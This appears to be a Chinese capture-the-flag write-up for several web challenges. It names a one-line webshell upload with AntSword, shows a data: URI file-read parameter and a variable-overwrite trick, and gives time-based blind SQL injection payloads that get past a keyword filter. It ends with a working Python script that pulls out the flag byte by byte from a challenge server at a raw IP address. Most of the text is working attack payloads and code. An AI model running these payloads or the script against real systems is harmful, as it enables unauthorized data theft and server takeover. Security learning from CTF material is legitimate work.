文件上传
上传一句话木马
蚁剑连接
根目录flag
GET传参
?text=data:text/plain,welcome to the beijing&file=/flag&password=r
变量覆盖
将flag的值赋给a，再让flag=a，输出flag
?a=flag&flag=a
sql
时间盲注查询数据库
id=1'/**/anandd/**/if((ascii(substr((select/**/database()),1,1)))>1,sleep(3),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(2),1)#
1'/**/anandd/**/if((ascii(substr((select/**/group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),{},1)))={},sleep(3),1)#
?id=1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1))),{},sleep(3),1)#
import requests
import time
# Time-based blind SQL injection extraction loop as posted in this writeup.
# The only oracle is wall-clock round-trip time of each POST: a slow reply is
# read as "the candidate byte at this position is correct".
url = "http://43.143.155.90:9801/index.php"  # challenge endpoint; the injectable POST field is `id`
flag = ""  # bytes recovered so far, appended in position order
for i in range(1, 50):  # i = 1-based character position inside group_concat(ovoflag)
    # Only bytes 96..126 are tried; a position whose byte lies outside that
    # range never matches, the inner loop runs out, and the position is
    # silently skipped (flag then comes out shorter than the real value).
    for j in range(96, 127):
        # `aandnd` and `/**/` suggest the target strips the keyword `and` and
        # spaces once before building the query (blacklist filter) — TODO
        # confirm against the challenge source. Defender note: a keyword
        # blacklist is not a substitute for parameterised queries.
        a = ("1'/**/aandnd/**/if((ascii(substr((select/**/group_concat(ovoflag)/**/from/**/fl4gishere),{},1)))={}"
        ",sleep(3),1)#").format(i, j)
        data = {'id': a}
        print(data)
        # Timing window covers the whole round trip, so network latency and
        # server load are indistinguishable from the injected sleep(3).
        start_time = time.time()
        r = requests.post(url=url, data=data)
        end_time = time.time()
        sec = end_time - start_time
        time.sleep(1)  # pacing between probes (~30 POSTs per recovered byte)
        # Threshold (2 s) is below the injected delay (3 s); an unmatched but
        # slow reply is therefore also counted as a hit and lands in `flag`.
        # Server-side signature: bursts of POSTs with `sleep(` in `id` and a
        # ~3 s response on the hits — visible in access logs / WAF telemetry.
        if sec >= 2:
            flag = flag + chr(j)
            print(flag)
            break  # first matching candidate wins; move to the next position